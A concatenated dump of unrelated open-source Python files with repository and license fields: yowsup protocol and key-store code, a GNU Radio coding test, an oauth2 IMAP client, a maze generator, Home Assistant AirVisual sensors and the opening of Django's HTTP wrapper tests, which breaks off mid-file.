self.sid = sid if sid else str((int(time.time()) + 11644477200) * 10000000)
self.index = int(index)
self.last = last
def __str__(self):
out = super(SyncIqProtocolEntity, self).__str__()
out += "sid: %s\n" % self.sid
out += "index: %s\n" % self.index
out += "last: %s\n" % self.last
return out
def toProtocolTreeNode(self):
syncNodeAttrs = {
"sid": self.sid,
"index": str(self.index),
"last": "true" if self.last else "false"
}
syncNode = ProtocolTreeNode("sync", syncNodeAttrs)
node = super(SyncIqProtocolEntity, self).toProtocolTreeNode()
node.addChild(syncNode)
return node
@staticmethod
def fromProtocolTreeNode(node):
syncNode = node.getChild("sync")
entity = IqProtocolEntity.fromProtocolTreeNode(node)
entity.__class__ = SyncIqProtocolEntity
entity.setSyncProps(
syncNode.getAttributeValue("sid"),
syncNode.getAttributeValue("index"),
syncNode.getAttributeValue("last")
)
return entity
| gpl-3.0 |
jmmartinez84/yowsup | yowsup/layers/axolotl/store/sqlite/litesignedprekeystore.py | 39 | 2191 | from axolotl.state.signedprekeystore import SignedPreKeyStore
from axolotl.state.signedprekeyrecord import SignedPreKeyRecord
from axolotl.invalidkeyidexception import InvalidKeyIdException
class LiteSignedPreKeyStore(SignedPreKeyStore):
def __init__(self, dbConn):
"""
:type dbConn: Connection
"""
self.dbConn = dbConn
dbConn.execute("CREATE TABLE IF NOT EXISTS signed_prekeys (_id INTEGER PRIMARY KEY AUTOINCREMENT,"
"prekey_id INTEGER UNIQUE, timestamp INTEGER, record BLOB);")
def loadSignedPreKey(self, signedPreKeyId):
q = "SELECT record FROM signed_prekeys WHERE prekey_id = ?"
cursor = self.dbConn.cursor()
cursor.execute(q, (signedPreKeyId,))
result = cursor.fetchone()
if not result:
raise InvalidKeyIdException("No such signedprekeyrecord! %s " % signedPreKeyId)
return SignedPreKeyRecord(serialized=result[0])
def loadSignedPreKeys(self):
q = "SELECT record FROM signed_prekeys"
cursor = self.dbConn.cursor()
cursor.execute(q,)
result = cursor.fetchall()
results = []
for row in result:
results.append(SignedPreKeyRecord(serialized=row[0]))
return results
def storeSignedPreKey(self, signedPreKeyId, signedPreKeyRecord):
#q = "DELETE FROM signed_prekeys WHERE prekey_id = ?"
#self.dbConn.cursor().execute(q, (signedPreKeyId,))
#self.dbConn.commit()
q = "INSERT INTO signed_prekeys (prekey_id, record) VALUES(?,?)"
cursor = self.dbConn.cursor()
cursor.execute(q, (signedPreKeyId, signedPreKeyRecord.serialize()))
self.dbConn.commit()
def containsSignedPreKey(self, signedPreKeyId):
q = "SELECT record FROM signed_prekeys WHERE prekey_id = ?"
cursor = self.dbConn.cursor()
cursor.execute(q, (signedPreKeyId,))
return cursor.fetchone() is not None
def removeSignedPreKey(self, signedPreKeyId):
q = "DELETE FROM signed_prekeys WHERE prekey_id = ?"
cursor = self.dbConn.cursor()
cursor.execute(q, (signedPreKeyId,))
self.dbConn.commit()
| gpl-3.0 |
mbr0wn/gnuradio | gr-trellis/examples/python/test_tcm.py | 6 | 4861 | #!/usr/bin/env python
from gnuradio import gr
from gnuradio import trellis, digital, blocks
from gnuradio import eng_notation
import math
import sys
import random
from gnuradio.trellis import fsm_utils
from gnuradio.eng_option import eng_option
from optparse import OptionParser
import numpy
try:
from gnuradio import analog
except ImportError:
sys.stderr.write("Error: Program requires gr-analog.\n")
sys.exit(1)
def run_test (f,Kb,bitspersymbol,K,dimensionality,constellation,N0,seed):
tb = gr.top_block ()
# TX
numpy.random.seed(-seed)
packet = numpy.random.randint(0,2,Kb) # create Kb random bits
packet[Kb-10:Kb]=0
packet[0:Kb]=0
src = blocks.vector_source_s(packet.tolist(),False)
b2s = blocks.unpacked_to_packed_ss(1,gr.GR_MSB_FIRST) # pack bits in shorts
s2fsmi = blocks.packed_to_unpacked_ss(bitspersymbol,gr.GR_MSB_FIRST) # unpack shorts to symbols compatible with the FSM input cardinality
enc = trellis.encoder_ss(f,0) # initial state = 0
mod = digital.chunks_to_symbols_sf(constellation,dimensionality)
# CHANNEL
add = blocks.add_ff()
noise = analog.noise_source_f(analog.GR_GAUSSIAN,math.sqrt(N0 / 2),int(seed))
# RX
va = trellis.viterbi_combined_fs(f,K,0,0,dimensionality,constellation,digital.TRELLIS_EUCLIDEAN) # Put -1 if the Initial/Final states are not set.
fsmi2s = blocks.unpacked_to_packed_ss(bitspersymbol,gr.GR_MSB_FIRST) # pack FSM input symbols to shorts
s2b = blocks.packed_to_unpacked_ss(1,gr.GR_MSB_FIRST) # unpack shorts to bits
dst = blocks.vector_sink_s();
tb.connect (src,b2s,s2fsmi,enc,mod)
tb.connect (mod,(add,0))
tb.connect (noise,(add,1))
tb.connect (add,va,fsmi2s,s2b,dst)
tb.run()
# A bit of cheating: run the program once and print the
# final encoder state..
# Then put it as the last argument in the viterbi block
#print "final state = " , enc.ST()
if len(dst.data()) != len(packet):
print("Error: not enough data:", len(dst.data()), len(packet))
ntotal=len(packet)
nwrong = sum(abs(packet-numpy.array(dst.data())));
return (ntotal,nwrong,abs(packet-numpy.array(dst.data())))
def main():
parser = OptionParser(option_class=eng_option)
parser.add_option("-f", "--fsm_file", type="string", default="fsm_files/awgn1o2_4.fsm", help="Filename containing the fsm specification, e.g. -f fsm_files/awgn1o2_4.fsm (default=fsm_files/awgn1o2_4.fsm)")
parser.add_option("-e", "--esn0", type="eng_float", default=10.0, help="Symbol energy to noise PSD level ratio in dB, e.g., -e 10.0 (default=10.0)")
parser.add_option("-r", "--repetitions", type="int", default=100, help="Number of packets to be generated for the simulation, e.g., -r 100 (default=100)")
(options, args) = parser.parse_args ()
if len(args) != 0:
parser.print_help()
raise SystemExit(1)
fname=options.fsm_file
esn0_db=float(options.esn0)
rep=int(options.repetitions)
# system parameters
f=trellis.fsm(fname) # get the FSM specification from a file
# alternatively you can specify the fsm from its generator matrix
#f=trellis.fsm(1,2,[5,7])
Kb=1024*16 # packet size in bits (make it multiple of 16 so it can be packed in a short)
bitspersymbol = int(round(math.log(f.I()) / math.log(2))) # bits per FSM input symbol
K=Kb / bitspersymbol # packet size in trellis steps
modulation = fsm_utils.psk4 # see fsm_utlis.py for available predefined modulations
dimensionality = modulation[0]
constellation = modulation[1]
if len(constellation) / dimensionality != f.O():
sys.stderr.write ('Incompatible FSM output cardinality and modulation size.\n')
sys.exit (1)
# calculate average symbol energy
Es = 0
for i in range(len(constellation)):
Es = Es + constellation[i]**2
Es = Es / (len(constellation)//dimensionality)
N0=Es / pow(10.0,esn0_db/10.0); # calculate noise variance
tot_b=0 # total number of transmitted bits
terr_b=0 # total number of bits in error
terr_p=0 # total number of packets in error
for i in range(rep):
(b,e,pattern)=run_test(f,Kb,bitspersymbol,K,dimensionality,constellation,N0,-(666+i)) # run experiment with different seed to get different noise realizations
tot_b=tot_b+b
terr_b=terr_b+e
terr_p=terr_p+(e!=0)
if ((i+1)%100==0) : # display progress
print(i+1,terr_p, '%.2e' % ((1.0*terr_p) / (i+1)),tot_b,terr_b, '%.2e' % ((1.0*terr_b) / tot_b))
if e!=0:
print("rep=",i, e)
for k in range(Kb):
if pattern[k]!=0:
print(k)
# estimate of the bit error rate
print(rep,terr_p, '%.2e' % ((1.0*terr_p) / (i+1)),tot_b,terr_b, '%.2e' % ((1.0*terr_b) / tot_b))
if __name__ == '__main__':
main()
| gpl-3.0 |
CyanogenMod/android_external_chromium | chrome/common/extensions/docs/examples/apps/hello-python/oauth2/clients/imap.py | 885 | 1685 | """
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import oauth2
import imaplib
class IMAP4_SSL(imaplib.IMAP4_SSL):
"""IMAP wrapper for imaplib.IMAP4_SSL that implements XOAUTH."""
def authenticate(self, url, consumer, token):
if consumer is not None and not isinstance(consumer, oauth2.Consumer):
raise ValueError("Invalid consumer.")
if token is not None and not isinstance(token, oauth2.Token):
raise ValueError("Invalid token.")
imaplib.IMAP4_SSL.authenticate(self, 'XOAUTH',
lambda x: oauth2.build_xoauth_string(url, consumer, token))
| bsd-3-clause |
bitcraft/pyweek19 | zort/environ/maze.py | 1 | 2942 | from heapq import heappush, heappop
import itertools
import random
from zort.hex_model import HexMapModel, Cell, evenr_to_axial
from zort.environ import util
def build_maze_from_hex(model, lower_limit=None, upper_limit=None,
height=1.0,
raised_tile='tileRock_full.png',
lowered_tile='tileGrass.png',
num_adjacent=1,
start_raised=True,
closed_set=set()):
def available_neighbors(coord):
return [c for c in neighbors(coord) if coord_available(c)]
def coord_available(coord):
return coord not in closed_set and \
len(closed_neighbors(coord)) <= num_adjacent
def closed_neighbors(coord):
return set(neighbors(coord)) - {current, current} & closed_set
def neighbors(coord):
return surrounding(coord)
def raise_cell(cell):
cell.raised = True
cell.height = height
cell.filename = raised_tile
def lower_cell(cell):
cell.raised = False
cell.height = 0.0
cell.filename = lowered_tile
if start_raised:
# Set all cells to raised
for cell in model.cells:
if cell[0] not in closed_set:
raise_cell(cell[1])
open_heap = set()
if lower_limit is None:
lower_limit = (1, 1)
if upper_limit is None:
upper_limit = (model.width - 2, model.height - 2)
start = (random.randint(lower_limit[0], upper_limit[0]),
random.randint(lower_limit[1], upper_limit[1]))
surrounding = util.surrounding(lower_limit, upper_limit)
current = start
open_heap.add(start)
closed_set.add(start)
lower_cell(model.get_cell(evenr_to_axial(start)))
open_neighbors = available_neighbors(start)
while open_heap or open_neighbors:
try:
current = random.choice(open_neighbors)
open_heap.add(current)
closed_set.add(current)
lower_cell(model.get_cell(evenr_to_axial(current)))
except IndexError:
current = open_heap.pop()
open_neighbors = available_neighbors(current)
return
def new_maze(map_width=10,
map_height=10,
tile_height=1.0,
raised_tile='tileRock_full.png',
lowered_tile='tileGrass.png',
num_adjacent=1):
model = HexMapModel()
for q, r in itertools.product(range(map_width), range(map_height)):
coords = evenr_to_axial((q, r))
cell = Cell()
cell.filename = lowered_tile
model.add_cell(coords, cell)
build_maze_from_hex(
model,
lower_limit=(1, 1),
upper_limit=(model.width - 2,
model.height - 2),
height=tile_height,
raised_tile=raised_tile,
lowered_tile=lowered_tile,
num_adjacent=num_adjacent)
return model
| bsd-2-clause |
nkgilley/home-assistant | homeassistant/components/airvisual/sensor.py | 6 | 9168 | """Support for AirVisual air quality sensors."""
from logging import getLogger
from homeassistant.const import (
ATTR_LATITUDE,
ATTR_LONGITUDE,
ATTR_STATE,
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_SHOW_ON_MAP,
CONF_STATE,
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS,
UNIT_PERCENTAGE,
)
from homeassistant.core import callback
from . import AirVisualEntity
from .const import (
CONF_CITY,
CONF_COUNTRY,
CONF_INTEGRATION_TYPE,
DATA_COORDINATOR,
DOMAIN,
INTEGRATION_TYPE_GEOGRAPHY,
)
_LOGGER = getLogger(__name__)
ATTR_CITY = "city"
ATTR_COUNTRY = "country"
ATTR_POLLUTANT_SYMBOL = "pollutant_symbol"
ATTR_POLLUTANT_UNIT = "pollutant_unit"
ATTR_REGION = "region"
MASS_PARTS_PER_MILLION = "ppm"
MASS_PARTS_PER_BILLION = "ppb"
VOLUME_MICROGRAMS_PER_CUBIC_METER = "µg/m3"
SENSOR_KIND_LEVEL = "air_pollution_level"
SENSOR_KIND_AQI = "air_quality_index"
SENSOR_KIND_POLLUTANT = "main_pollutant"
SENSOR_KIND_BATTERY_LEVEL = "battery_level"
SENSOR_KIND_HUMIDITY = "humidity"
SENSOR_KIND_TEMPERATURE = "temperature"
GEOGRAPHY_SENSORS = [
(SENSOR_KIND_LEVEL, "Air Pollution Level", "mdi:gauge", None),
(SENSOR_KIND_AQI, "Air Quality Index", "mdi:chart-line", "AQI"),
(SENSOR_KIND_POLLUTANT, "Main Pollutant", "mdi:chemical-weapon", None),
]
GEOGRAPHY_SENSOR_LOCALES = {"cn": "Chinese", "us": "U.S."}
NODE_PRO_SENSORS = [
(SENSOR_KIND_BATTERY_LEVEL, "Battery", DEVICE_CLASS_BATTERY, UNIT_PERCENTAGE),
(SENSOR_KIND_HUMIDITY, "Humidity", DEVICE_CLASS_HUMIDITY, UNIT_PERCENTAGE),
(SENSOR_KIND_TEMPERATURE, "Temperature", DEVICE_CLASS_TEMPERATURE, TEMP_CELSIUS),
]
POLLUTANT_LEVEL_MAPPING = [
{"label": "Good", "icon": "mdi:emoticon-excited", "minimum": 0, "maximum": 50},
{"label": "Moderate", "icon": "mdi:emoticon-happy", "minimum": 51, "maximum": 100},
{
"label": "Unhealthy for sensitive groups",
"icon": "mdi:emoticon-neutral",
"minimum": 101,
"maximum": 150,
},
{"label": "Unhealthy", "icon": "mdi:emoticon-sad", "minimum": 151, "maximum": 200},
{
"label": "Very Unhealthy",
"icon": "mdi:emoticon-dead",
"minimum": 201,
"maximum": 300,
},
{"label": "Hazardous", "icon": "mdi:biohazard", "minimum": 301, "maximum": 10000},
]
POLLUTANT_MAPPING = {
"co": {"label": "Carbon Monoxide", "unit": CONCENTRATION_PARTS_PER_MILLION},
"n2": {"label": "Nitrogen Dioxide", "unit": CONCENTRATION_PARTS_PER_BILLION},
"o3": {"label": "Ozone", "unit": CONCENTRATION_PARTS_PER_BILLION},
"p1": {"label": "PM10", "unit": CONCENTRATION_MICROGRAMS_PER_CUBIC_METER},
"p2": {"label": "PM2.5", "unit": CONCENTRATION_MICROGRAMS_PER_CUBIC_METER},
"s2": {"label": "Sulfur Dioxide", "unit": CONCENTRATION_PARTS_PER_BILLION},
}
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up AirVisual sensors based on a config entry."""
coordinator = hass.data[DOMAIN][DATA_COORDINATOR][config_entry.entry_id]
if config_entry.data[CONF_INTEGRATION_TYPE] == INTEGRATION_TYPE_GEOGRAPHY:
sensors = [
AirVisualGeographySensor(
coordinator, config_entry, kind, name, icon, unit, locale,
)
for locale in GEOGRAPHY_SENSOR_LOCALES
for kind, name, icon, unit in GEOGRAPHY_SENSORS
]
else:
sensors = [
AirVisualNodeProSensor(coordinator, kind, name, device_class, unit)
for kind, name, device_class, unit in NODE_PRO_SENSORS
]
async_add_entities(sensors, True)
class AirVisualGeographySensor(AirVisualEntity):
"""Define an AirVisual sensor related to geography data via the Cloud API."""
def __init__(self, coordinator, config_entry, kind, name, icon, unit, locale):
"""Initialize."""
super().__init__(coordinator)
self._attrs.update(
{
ATTR_CITY: config_entry.data.get(CONF_CITY),
ATTR_STATE: config_entry.data.get(CONF_STATE),
ATTR_COUNTRY: config_entry.data.get(CONF_COUNTRY),
}
)
self._config_entry = config_entry
self._icon = icon
self._kind = kind
self._locale = locale
self._name = name
self._state = None
self._unit = unit
@property
def available(self):
"""Return True if entity is available."""
try:
return self.coordinator.last_update_success and bool(
self.coordinator.data["current"]["pollution"]
)
except KeyError:
return False
@property
def name(self):
"""Return the name."""
return f"{GEOGRAPHY_SENSOR_LOCALES[self._locale]} {self._name}"
@property
def state(self):
"""Return the state."""
return self._state
@property
def unique_id(self):
"""Return a unique, Home Assistant friendly identifier for this entity."""
return f"{self._config_entry.unique_id}_{self._locale}_{self._kind}"
@callback
def update_from_latest_data(self):
"""Update the entity from the latest data."""
try:
data = self.coordinator.data["current"]["pollution"]
except KeyError:
return
if self._kind == SENSOR_KIND_LEVEL:
aqi = data[f"aqi{self._locale}"]
[level] = [
i
for i in POLLUTANT_LEVEL_MAPPING
if i["minimum"] <= aqi <= i["maximum"]
]
self._state = level["label"]
self._icon = level["icon"]
elif self._kind == SENSOR_KIND_AQI:
self._state = data[f"aqi{self._locale}"]
elif self._kind == SENSOR_KIND_POLLUTANT:
symbol = data[f"main{self._locale}"]
self._state = POLLUTANT_MAPPING[symbol]["label"]
self._attrs.update(
{
ATTR_POLLUTANT_SYMBOL: symbol,
ATTR_POLLUTANT_UNIT: POLLUTANT_MAPPING[symbol]["unit"],
}
)
if CONF_LATITUDE in self._config_entry.data:
if self._config_entry.options[CONF_SHOW_ON_MAP]:
self._attrs[ATTR_LATITUDE] = self._config_entry.data[CONF_LATITUDE]
self._attrs[ATTR_LONGITUDE] = self._config_entry.data[CONF_LONGITUDE]
self._attrs.pop("lati", None)
self._attrs.pop("long", None)
else:
self._attrs["lati"] = self._config_entry.data[CONF_LATITUDE]
self._attrs["long"] = self._config_entry.data[CONF_LONGITUDE]
self._attrs.pop(ATTR_LATITUDE, None)
self._attrs.pop(ATTR_LONGITUDE, None)
class AirVisualNodeProSensor(AirVisualEntity):
"""Define an AirVisual sensor related to a Node/Pro unit."""
def __init__(self, coordinator, kind, name, device_class, unit):
"""Initialize."""
super().__init__(coordinator)
self._device_class = device_class
self._kind = kind
self._name = name
self._state = None
self._unit = unit
@property
def device_class(self):
"""Return the device class."""
return self._device_class
@property
def device_info(self):
"""Return device registry information for this entity."""
return {
"identifiers": {
(DOMAIN, self.coordinator.data["current"]["serial_number"])
},
"name": self.coordinator.data["current"]["settings"]["node_name"],
"manufacturer": "AirVisual",
"model": f'{self.coordinator.data["current"]["status"]["model"]}',
"sw_version": (
f'Version {self.coordinator.data["current"]["status"]["system_version"]}'
f'{self.coordinator.data["current"]["status"]["app_version"]}'
),
}
@property
def name(self):
"""Return the name."""
node_name = self.coordinator.data["current"]["settings"]["node_name"]
return f"{node_name} Node/Pro: {self._name}"
@property
def state(self):
"""Return the state."""
return self._state
@property
def unique_id(self):
"""Return a unique, Home Assistant friendly identifier for this entity."""
return f"{self.coordinator.data['current']['serial_number']}_{self._kind}"
@callback
def update_from_latest_data(self):
"""Update the entity from the latest data."""
if self._kind == SENSOR_KIND_BATTERY_LEVEL:
self._state = self.coordinator.data["current"]["status"]["battery"]
elif self._kind == SENSOR_KIND_HUMIDITY:
self._state = self.coordinator.data["current"]["measurements"].get(
"humidity"
)
elif self._kind == SENSOR_KIND_TEMPERATURE:
self._state = self.coordinator.data["current"]["measurements"].get(
"temperature_C"
)
| apache-2.0 |
whs/django | tests/httpwrappers/tests.py | 1 | 30662 | import copy
import json
import os
import pickle
import unittest
import uuid
from django.core.exceptions import DisallowedRedirect
from django.core.serializers.json import DjangoJSONEncoder
from django.core.signals import request_finished
from django.db import close_old_connections
from django.http import (
BadHeaderError, HttpResponse, HttpResponseNotAllowed,
HttpResponseNotModified, HttpResponsePermanentRedirect,
HttpResponseRedirect, JsonResponse, QueryDict, SimpleCookie,
StreamingHttpResponse, parse_cookie,
)
from django.test import SimpleTestCase
from django.utils.functional import lazystr
class QueryDictTests(SimpleTestCase):
def test_create_with_no_args(self):
self.assertEqual(QueryDict(), QueryDict(''))
def test_missing_key(self):
q = QueryDict()
with self.assertRaises(KeyError):
q.__getitem__('foo')
def test_immutability(self):
q = QueryDict()
with self.assertRaises(AttributeError):
q.__setitem__('something', 'bar')
with self.assertRaises(AttributeError):
q.setlist('foo', ['bar'])
with self.assertRaises(AttributeError):
q.appendlist('foo', ['bar'])
with self.assertRaises(AttributeError):
q.update({'foo': 'bar'})
with self.assertRaises(AttributeError):
q.pop('foo')
with self.assertRaises(AttributeError):
q.popitem()
with self.assertRaises(AttributeError):
q.clear()
def test_immutable_get_with_default(self):
q = QueryDict()
self.assertEqual(q.get('foo', 'default'), 'default')
def test_immutable_basic_operations(self):
q = QueryDict()
self.assertEqual(q.getlist('foo'), [])
self.assertNotIn('foo', q)
self.assertEqual(list(q), [])
self.assertEqual(list(q.items()), [])
self.assertEqual(list(q.lists()), [])
self.assertEqual(list(q.keys()), [])
self.assertEqual(list(q.values()), [])
self.assertEqual(len(q), 0)
self.assertEqual(q.urlencode(), '')
def test_single_key_value(self):
"""Test QueryDict with one key/value pair"""
q = QueryDict('foo=bar')
self.assertEqual(q['foo'], 'bar')
with self.assertRaises(KeyError):
q.__getitem__('bar')
with self.assertRaises(AttributeError):
q.__setitem__('something', 'bar')
self.assertEqual(q.get('foo', 'default'), 'bar')
self.assertEqual(q.get('bar', 'default'), 'default')
self.assertEqual(q.getlist('foo'), ['bar'])
self.assertEqual(q.getlist('bar'), [])
with self.assertRaises(AttributeError):
q.setlist('foo', ['bar'])
with self.assertRaises(AttributeError):
q.appendlist('foo', ['bar'])
self.assertIn('foo', q)
self.assertNotIn('bar', q)
self.assertEqual(list(q), ['foo'])
self.assertEqual(list(q.items()), [('foo', 'bar')])
self.assertEqual(list(q.lists()), [('foo', ['bar'])])
self.assertEqual(list(q.keys()), ['foo'])
self.assertEqual(list(q.values()), ['bar'])
self.assertEqual(len(q), 1)
with self.assertRaises(AttributeError):
q.update({'foo': 'bar'})
with self.assertRaises(AttributeError):
q.pop('foo')
with self.assertRaises(AttributeError):
q.popitem()
with self.assertRaises(AttributeError):
q.clear()
with self.assertRaises(AttributeError):
q.setdefault('foo', 'bar')
self.assertEqual(q.urlencode(), 'foo=bar')
def test_urlencode(self):
q = QueryDict(mutable=True)
q['next'] = '/a&b/'
self.assertEqual(q.urlencode(), 'next=%2Fa%26b%2F')
self.assertEqual(q.urlencode(safe='/'), 'next=/a%26b/')
q = QueryDict(mutable=True)
q['next'] = '/t\xebst&key/'
self.assertEqual(q.urlencode(), 'next=%2Ft%C3%ABst%26key%2F')
self.assertEqual(q.urlencode(safe='/'), 'next=/t%C3%ABst%26key/')
def test_mutable_copy(self):
"""A copy of a QueryDict is mutable."""
q = QueryDict().copy()
with self.assertRaises(KeyError):
q.__getitem__("foo")
q['name'] = 'john'
self.assertEqual(q['name'], 'john')
def test_mutable_delete(self):
q = QueryDict(mutable=True)
q['name'] = 'john'
del q['name']
self.assertNotIn('name', q)
def test_basic_mutable_operations(self):
q = QueryDict(mutable=True)
q['name'] = 'john'
self.assertEqual(q.get('foo', 'default'), 'default')
self.assertEqual(q.get('name', 'default'), 'john')
self.assertEqual(q.getlist('name'), ['john'])
self.assertEqual(q.getlist('foo'), [])
q.setlist('foo', ['bar', 'baz'])
self.assertEqual(q.get('foo', 'default'), 'baz')
self.assertEqual(q.getlist('foo'), ['bar', 'baz'])
q.appendlist('foo', 'another')
self.assertEqual(q.getlist('foo'), ['bar', 'baz', 'another'])
self.assertEqual(q['foo'], 'another')
self.assertIn('foo', q)
self.assertCountEqual(q, ['foo', 'name'])
self.assertCountEqual(q.items(), [('foo', 'another'), ('name', 'john')])
self.assertCountEqual(q.lists(), [('foo', ['bar', 'baz', 'another']), ('name', ['john'])])
self.assertCountEqual(q.keys(), ['foo', 'name'])
self.assertCountEqual(q.values(), ['another', 'john'])
q.update({'foo': 'hello'})
self.assertEqual(q['foo'], 'hello')
self.assertEqual(q.get('foo', 'not available'), 'hello')
self.assertEqual(q.getlist('foo'), ['bar', 'baz', 'another', 'hello'])
self.assertEqual(q.pop('foo'), ['bar', 'baz', 'another', 'hello'])
self.assertEqual(q.pop('foo', 'not there'), 'not there')
self.assertEqual(q.get('foo', 'not there'), 'not there')
self.assertEqual(q.setdefault('foo', 'bar'), 'bar')
self.assertEqual(q['foo'], 'bar')
self.assertEqual(q.getlist('foo'), ['bar'])
self.assertIn(q.urlencode(), ['foo=bar&name=john', 'name=john&foo=bar'])
q.clear()
self.assertEqual(len(q), 0)
def test_multiple_keys(self):
"""Test QueryDict with two key/value pairs with same keys."""
q = QueryDict('vote=yes&vote=no')
self.assertEqual(q['vote'], 'no')
with self.assertRaises(AttributeError):
q.__setitem__('something', 'bar')
self.assertEqual(q.get('vote', 'default'), 'no')
self.assertEqual(q.get('foo', 'default'), 'default')
self.assertEqual(q.getlist('vote'), ['yes', 'no'])
self.assertEqual(q.getlist('foo'), [])
with self.assertRaises(AttributeError):
q.setlist('foo', ['bar', 'baz'])
with self.assertRaises(AttributeError):
q.setlist('foo', ['bar', 'baz'])
with self.assertRaises(AttributeError):
q.appendlist('foo', ['bar'])
self.assertIn('vote', q)
self.assertNotIn('foo', q)
self.assertEqual(list(q), ['vote'])
self.assertEqual(list(q.items()), [('vote', 'no')])
self.assertEqual(list(q.lists()), [('vote', ['yes', 'no'])])
self.assertEqual(list(q.keys()), ['vote'])
self.assertEqual(list(q.values()), ['no'])
self.assertEqual(len(q), 1)
with self.assertRaises(AttributeError):
q.update({'foo': 'bar'})
with self.assertRaises(AttributeError):
q.pop('foo')
with self.assertRaises(AttributeError):
q.popitem()
with self.assertRaises(AttributeError):
q.clear()
with self.assertRaises(AttributeError):
q.setdefault('foo', 'bar')
with self.assertRaises(AttributeError):
q.__delitem__('vote')
def test_pickle(self):
q = QueryDict()
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q, q1)
q = QueryDict('a=b&c=d')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q, q1)
q = QueryDict('a=b&c=d&a=1')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q, q1)
def test_update_from_querydict(self):
"""Regression test for #8278: QueryDict.update(QueryDict)"""
x = QueryDict("a=1&a=2", mutable=True)
y = QueryDict("a=3&a=4")
x.update(y)
self.assertEqual(x.getlist('a'), ['1', '2', '3', '4'])
def test_non_default_encoding(self):
"""#13572 - QueryDict with a non-default encoding"""
q = QueryDict('cur=%A4', encoding='iso-8859-15')
self.assertEqual(q.encoding, 'iso-8859-15')
self.assertEqual(list(q.items()), [('cur', '€')])
self.assertEqual(q.urlencode(), 'cur=%A4')
q = q.copy()
self.assertEqual(q.encoding, 'iso-8859-15')
self.assertEqual(list(q.items()), [('cur', '€')])
self.assertEqual(q.urlencode(), 'cur=%A4')
self.assertEqual(copy.copy(q).encoding, 'iso-8859-15')
self.assertEqual(copy.deepcopy(q).encoding, 'iso-8859-15')
def test_querydict_fromkeys(self):
self.assertEqual(QueryDict.fromkeys(['key1', 'key2', 'key3']), QueryDict('key1&key2&key3'))
def test_fromkeys_with_nonempty_value(self):
self.assertEqual(
QueryDict.fromkeys(['key1', 'key2', 'key3'], value='val'),
QueryDict('key1=val&key2=val&key3=val')
)
def test_fromkeys_is_immutable_by_default(self):
# Match behavior of __init__() which is also immutable by default.
q = QueryDict.fromkeys(['key1', 'key2', 'key3'])
with self.assertRaisesMessage(AttributeError, 'This QueryDict instance is immutable'):
q['key4'] = 'nope'
def test_fromkeys_mutable_override(self):
q = QueryDict.fromkeys(['key1', 'key2', 'key3'], mutable=True)
q['key4'] = 'yep'
self.assertEqual(q, QueryDict('key1&key2&key3&key4=yep'))
def test_duplicates_in_fromkeys_iterable(self):
self.assertEqual(QueryDict.fromkeys('xyzzy'), QueryDict('x&y&z&z&y'))
def test_fromkeys_with_nondefault_encoding(self):
key_utf16 = b'\xff\xfe\x8e\x02\xdd\x01\x9e\x02'
value_utf16 = b'\xff\xfe\xdd\x01n\x00l\x00P\x02\x8c\x02'
q = QueryDict.fromkeys([key_utf16], value=value_utf16, encoding='utf-16')
expected = QueryDict('', mutable=True)
expected['ʎǝʞ'] = 'ǝnlɐʌ'
self.assertEqual(q, expected)
def test_fromkeys_empty_iterable(self):
self.assertEqual(QueryDict.fromkeys([]), QueryDict(''))
def test_fromkeys_noniterable(self):
with self.assertRaises(TypeError):
QueryDict.fromkeys(0)
class HttpResponseTests(unittest.TestCase):
def test_headers_type(self):
r = HttpResponse()
# ASCII strings or bytes values are converted to strings.
r['key'] = 'test'
self.assertEqual(r['key'], 'test')
r['key'] = 'test'.encode('ascii')
self.assertEqual(r['key'], 'test')
self.assertIn(b'test', r.serialize_headers())
# Non-ASCII values are serialized to Latin-1.
r['key'] = 'café'
self.assertIn('café'.encode('latin-1'), r.serialize_headers())
# Other unicode values are MIME-encoded (there's no way to pass them as bytes).
r['key'] = '†'
self.assertEqual(r['key'], '=?utf-8?b?4oCg?=')
self.assertIn(b'=?utf-8?b?4oCg?=', r.serialize_headers())
# The response also converts string or bytes keys to strings, but requires
# them to contain ASCII
r = HttpResponse()
del r['Content-Type']
r['foo'] = 'bar'
headers = list(r.items())
self.assertEqual(len(headers), 1)
self.assertEqual(headers[0], ('foo', 'bar'))
r = HttpResponse()
del r['Content-Type']
r[b'foo'] = 'bar'
headers = list(r.items())
self.assertEqual(len(headers), 1)
self.assertEqual(headers[0], ('foo', 'bar'))
self.assertIsInstance(headers[0][0], str)
r = HttpResponse()
with self.assertRaises(UnicodeError):
r.__setitem__('føø', 'bar')
with self.assertRaises(UnicodeError):
r.__setitem__('føø'.encode(), 'bar')
def test_long_line(self):
# Bug #20889: long lines trigger newlines to be added to headers
# (which is not allowed due to bug #10188)
h = HttpResponse()
f = 'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz a\xcc\x88'.encode('latin-1')
f = f.decode('utf-8')
h['Content-Disposition'] = 'attachment; filename="%s"' % f
# This one is triggering http://bugs.python.org/issue20747, that is Python
# will itself insert a newline in the header
